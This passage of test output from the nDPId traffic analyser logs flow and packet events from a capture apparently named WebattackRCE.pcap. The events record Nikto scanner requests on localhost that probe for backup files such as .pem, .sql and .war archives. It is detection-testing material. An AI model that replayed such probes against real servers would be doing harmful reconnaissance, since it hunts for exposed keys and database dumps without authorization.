(Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277109,"flow_last_seen":1576420277109,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277109,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50102,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":1,"flow_last_seen":1576420277109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277109,"pkt":"AAAAAAAAAAAAAAAACABFAADFvlhAAEAGfdh\/AAABfwAAAcO2H5BO24YshrKR94AYAED+uQAAAQEICp1m\/J2dZvydR0VUIC8xMjcuMC4wLjEuZWdnIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277109,"flow_last_seen":1576420277109,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277109,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50102,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277113,"flow_last_seen":1576420277113,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277113,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50104,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":1,"flow_last_seen":1576420277113,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277113,"pkt":"AAAAAAAAAAAAAAAACABFAADF+v9AAEAGQTF\/AAABfwAAAcO4H5AzScKEmziDBYAYAED+uQAAAQEICp1m\/KGdZvyhR0VUIC8xMjcuMC4wLjEuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":280,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277113,"flow_last_seen":1576420277113,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277113,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50104,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277115,"flow_last_seen":1576420277115,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277115,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50106,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":1,"flow_last_seen":1576420277115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277115,"pkt":"AAAAAAAAAAAAAAAACABFAADAxXJAAEAGdsN\/AAABfwAAAcO6H5BPqv0Pb+YcGYAYAED+tAAAAQEICp1m\/KOdZvyjR0VUIC8xMjcwLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":281,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277115,"flow_last_seen":1576420277115,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277115,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50106,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277116,"flow_last_seen":1576420277116,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277116,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50108,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":1,"flow_last_seen":1576420277116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277116,"pkt":"AAAAAAAAAAAAAAAACABFAADAsDlAAEAGi\/x\/AAABfwAAAcO8H5B5M4hJ8rxYu4AYAED+tAAAAQEICp1m\/KSdZvykR0VUIC8xMjcwLmVnZyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277116,"flow_last_seen":1576420277116,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277116,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50108,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":283,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277118,"flow_last_seen":1576420277118,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50110,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":1,"flow_last_seen":1576420277118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277118,"pkt":"AAAAAAAAAAAAAAAACABFAADBWpRAAEAG4aB\/AAABfwAAAcO+H5A50mLuGW1voYAYAED+tQAAAQEICp1m\/KadZvymR0VUIC8xMjcwMC5wZW0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":283,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277118,"flow_last_seen":1576420277118,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50110,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":284,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277119,"flow_last_seen":1576420277119,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277119,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50112,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":1,"flow_last_seen":1576420277119,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277119,"pkt":"AAAAAAAAAAAAAAAACABFAADBojBAAEAGmgR\/AAABfwAAAcPAH5CoeZpSE7JOEoAYAED+tQAAAQEICp1m\/KedZvynR0VUIC8xMjcwMC5wZW0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277119,"flow_last_seen":1576420277119,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277119,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50112,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":285,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277121,"flow_last_seen":1576420277121,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277121,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50114,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":285,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":1,"flow_last_seen":1576420277121,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277121,"pkt":"AAAAAAAAAAAAAAAACABFAADB1+ZAAEAGZE5\/AAABfwAAAcPCH5Dv1e9lqA5LqYAYAED+tQAAAQEICp1m\/KidZvyoR0VUIC8xMjcwMC5zcWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277121,"flow_last_seen":1576420277121,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277121,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50114,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":286,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277122,"flow_last_seen":1576420277122,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277122,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50116,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":1,"flow_last_seen":1576420277122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277122,"pkt":"AAAAAAAAAAAAAAAACABFAADBr9xAAEAGjFh\/AAABfwAAAcPEH5A9f5dbU\/lctoAYAED+tQAAAQEICp1m\/KqdZvyqR0VUIC8xMjcwMC5zcWwgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":286,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277122,"flow_last_seen":1576420277122,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277122,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50116,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":287,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277123,"flow_last_seen":1576420277123,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277123,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50118,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":1,"flow_last_seen":1576420277123,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277123,"pkt":"AAAAAAAAAAAAAAAACABFAADAYAxAAEAG3Cl\/AAABfwAAAcPGH5DSd1iLatlmxYAYAED+tAAAAQEICp1m\/KudZvyrR0VUIC9zaXRlLmVnZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277123,"flow_last_seen":1576420277123,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277123,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50118,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":288,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277126,"flow_last_seen":1576420277126,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277126,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50120,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":1,"flow_last_seen":1576420277126,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277126,"pkt":"AAAAAAAAAAAAAAAACABFAADA98ZAAEAGRG9\/AAABfwAAAcPIH5D1l89GxMECdIAYAED+tAAAAQEICp1m\/K6dZvytR0VUIC9zaXRlLmVnZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277126,"flow_last_seen":1576420277126,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277126,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50120,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277127,"flow_last_seen":1576420277127,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277127,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50122,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":1,"flow_last_seen":1576420277127,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277127,"pkt":"AAAAAAAAAAAAAAAACABFAADBPaVAAEAG\/o9\/AAABfwAAAcPKH5CdTAUjrG8+WIAYAED+tQAAAQEICp1m\/K+dZvyvR0VUIC8xMjcuMC53YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":289,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277127,"flow_last_seen":1576420277127,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277127,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50122,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 